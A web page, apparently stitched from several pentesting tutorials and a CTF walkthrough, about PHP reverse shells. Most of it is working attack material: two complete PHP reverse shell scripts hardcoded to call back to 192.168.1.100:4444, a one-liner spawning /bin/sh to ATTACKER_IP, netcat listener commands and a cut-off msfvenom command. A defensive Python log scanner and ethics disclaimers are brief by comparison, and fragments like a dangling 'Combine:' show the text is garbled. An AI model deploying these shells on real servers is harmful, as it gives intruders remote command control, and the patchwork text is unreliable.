Reverse Shell PHP
Here is a simplified, annotated version. The most famous public example is the php-reverse-shell.php from PentestMonkey (now maintained in the laudanum project).
<?php
// Set the attacker's IP address and listening port
$ip = '192.168.1.100'; // CHANGE THIS
$port = 4444;          // CHANGE THIS

// Create a TCP socket back to the listener
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    // Failed to connect
    echo "Error: $errstr ($errno)";
    exit(1);
}

// Simple command loop: read a line from the socket, run it, and write the output back.
// (This does not redirect STDIN/STDOUT/STDERR to the socket; each command runs to
// completion via shell_exec before its output is returned.)
fwrite($sock, "Connected! Type commands:\n");
while (!feof($sock)) {
    // Send a prompt
    fwrite($sock, "shell> ");

    // Read command from attacker (fgets returns false once the socket is closed)
    $cmd = fgets($sock, 1024);
    if ($cmd === false || trim($cmd) == "exit") {
        break;
    }

    // Execute command and capture output
    $output = shell_exec($cmd . " 2>&1"); // 2>&1 includes stderr

    // Send output back to attacker
    fwrite($sock, $output);
}

fclose($sock);
?>
A PHP reverse shell is a powerful technique, but it relies on two weaknesses: the ability to get attacker-controlled PHP uploaded to or executed on the server, and the server's freedom to open arbitrary outbound connections.
Eliminate either one, and the attack fails. Defense in depth means patching both: restrict file uploads/execution AND block unexpected outbound connections.
Stay safe, get permission, and always hack ethically.
A PHP reverse shell is a script that, when executed on a target web server, initiates an outbound connection back to your machine, providing a command-line interface to the server. This technique is commonly used during penetration testing to gain interactive access after discovering a file upload or code execution vulnerability.

1. Obtain a Reverse Shell Script

The most reliable way to establish a connection is to use an established, pre-written script.
Pentest Monkey PHP Reverse Shell: Widely considered the industry standard for PHP web shells. It provides a full interactive shell that supports interactive programs like ssh or su.
You can download it from the Pentest Monkey GitHub repository.
Kali Linux Local Copy: If you are using Kali Linux, a copy is already available at /usr/share/webshells/php/php-reverse-shell.php.
MSFVenom: You can generate a custom payload using Metasploit with the following command:

msfvenom -p php/meterpreter_reverse_tcp LHOST=

2. Configure the Script
Before uploading, you must edit the script to point back to your machine. Open the .php file in a text editor like nano. Locate the $ip and $port variables.
Change $ip to your attacking machine's IP address (use your VPN IP if on a platform like Hack The Box).
Set $port to any open port on your machine (e.g., 4444 or 1234).

3. Start a Listener

On your attacking machine, you must set up a listener to "catch" the incoming connection.

RootMe (CTF Walkthrough). A TryHackMe Lab | by Marduk I Am

What is a PHP Reverse Shell?

A PHP reverse shell is a type of malicious script or legitimate administrative tool where a target server initiates an outbound connection to an attacker's machine, providing interactive command-line access. Unlike traditional "bind shells," which open a port and wait for a connection, reverse shells are highly effective at bypassing firewalls and Network Address Translation (NAT) because they appear as legitimate outbound traffic.

A PHP reverse shell exploits the fact that many web servers have the PHP interpreter installed and allow it to execute system-level commands. By executing a PHP script—often through a vulnerability like unrestricted file upload or remote code execution (RCE)—an attacker can force the server to "call back" to their own computer.
Bypassing Firewalls: Most firewalls are configured to block incoming connections but allow outgoing ones (e.g., for updates or web browsing). A reverse shell takes advantage of this "inside-out" vulnerability.
Interactive Control: Once the connection is established, the attacker can issue real-time shell commands, navigate the file system, and escalate privileges.

Common PHP Reverse Shell Payloads

Attackers use various methods to establish these connections, ranging from simple one-liners to complex scripts.

1. PHP One-Liner (Command Line)

If an attacker has the ability to run a single command on the target, they might use a one-liner that utilizes fsockopen to create a TCP connection:

php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Creating a PHP reverse shell involves two main components: a listener on your machine to catch the connection and a payload uploaded to the target server to initiate it.

1. Set Up the Listener

Before executing the PHP code, you must have a listener waiting for the incoming connection. Netcat is the standard tool for this. Open a terminal on your Kali Linux or any Linux machine and run:
nc -lvnp 4444
For a more stable shell (with tab completion and history), use:
rlwrap nc -lvnp 4444
A reverse shell is a type of shell where the target machine (victim) initiates a connection back to the attacker’s machine. This is opposite to a "bind shell" (where the victim listens for incoming connections).
Why reverse shells?
Look for HTTP requests containing base64-encoded payloads or long strings with fsockopen, stream_socket_client, etc.
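As an added illustration of that log review (example code written for this page, not taken from any of the sources quoted here): a small Python checker that scans logged request lines, including their URL-decoded and base64-decoded layers, for the functions the shells on this page depend on. The sample requests, the 40-character base64 threshold and the indicator list are constructed assumptions.

```python
import base64
import re
from urllib.parse import quote, unquote_plus

# PHP functions and strings the reverse shells on this page rely on (indicator list is an assumption).
FUNC_CALL = re.compile(r"\b(fsockopen|stream_socket_client|proc_open|popen|shell_exec"
                       r"|passthru|system|exec|eval|base64_decode)\s*\(", re.IGNORECASE)
LITERALS = ("/bin/sh", "/bin/bash", "2>&3")
# Runs of base64 alphabet long enough to hide a payload (40 characters is an assumed threshold).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def decoded_layers(text):
    """Return the request as logged, URL-decoded, and with every base64 run decoded."""
    layers = [text, unquote_plus(text)]
    for layer in list(layers):
        for m in B64_RUN.finditer(layer):
            try:
                layers.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore"))
            except ValueError:  # not valid base64 after all (binascii.Error is a ValueError)
                continue
    return layers

def find_indicators(request_line):
    """Sorted list of reverse-shell indicators found in any layer of one logged request."""
    hits = set()
    for layer in decoded_layers(request_line):
        hits.update(m.group(1).lower() for m in FUNC_CALL.finditer(layer))
        hits.update(lit for lit in LITERALS if lit in layer)
    return sorted(hits)

def scan_requests(lines):
    """(index, indicators) for every logged request that deserves an analyst's attention."""
    return [(i, h) for i, line in enumerate(lines) if (h := find_indicators(line))]

# Constructed sample requests (not real traffic); the encoded variants are built from one payload.
PAYLOAD = '$s=fsockopen("10.0.0.5",4444);'
SAMPLE_REQUESTS = [
    'POST /upload.php body=filename="avatar.png"&desc=hello',   # benign upload
    'POST /upload.php body=<?php ' + PAYLOAD + ' ?>',            # plain PHP inside an "image"
    'GET /index.php?cmd=' + quote(PAYLOAD, safe=""),             # URL-encoded one-liner
    'POST /upload.php body=eval(base64_decode("'
    + base64.b64encode(PAYLOAD.encode()).decode() + '"));',      # base64-wrapped payload
]

if __name__ == "__main__":
    for i, hits in scan_requests(SAMPLE_REQUESTS):
        print(f"request {i}: {', '.join(hits)}")
```

Run it over real access-log request lines or WAF captures; anything flagged in the base64 layer is the pattern the paragraph above describes and is worth pulling the uploaded file for.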
The PHP reverse shell is a perfect microcosm of the cybersecurity arms race. For every defensive measure—disabling exec, filtering egress traffic, scanning files—attackers invent a new evasion: polymorphic code, encrypted tunnels, or leveraging mail() to pop a shell.
As a defender, your goal is not absolute perfection (it doesn’t exist) but defense in depth. Combine:
As an ethical hacker, always remember the immense responsibility that comes with wielding these techniques. A PHP reverse shell is a skeleton key to a server’s soul. Use it only to illuminate the locks, never to pick them without permission.
<?php
set_time_limit(0);
$ip = '192.168.1.100';
$port = 4444;

$sock = @fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    die("No connection: $errstr ($errno)");
}

// Spawn a shell process
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin
    1 => array("pipe", "w"), // stdout
    2 => array("pipe", "w")  // stderr
);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

if (is_resource($process)) {
    // Forward socket <-> shell bidirectionally
    stream_set_blocking($pipes[0], 0);
    stream_set_blocking($pipes[1], 0);
    stream_set_blocking($pipes[2], 0);
    stream_set_blocking($sock, 0);

    while (true) {
        // Read from socket -> send to shell stdin
        $socket_read = fread($sock, 1024);
        if ($socket_read) fwrite($pipes[0], $socket_read);

        // Read from shell stdout -> send to socket
        $stdout_read = fread($pipes[1], 1024);
        if ($stdout_read) fwrite($sock, $stdout_read);

        // Read from shell stderr -> send to socket
        $stderr_read = fread($pipes[2], 1024);
        if ($stderr_read) fwrite($sock, $stderr_read);

        // Check if socket is dead
        if (feof($sock)) break;
    }

    fclose($sock);
    proc_close($process);
}
?>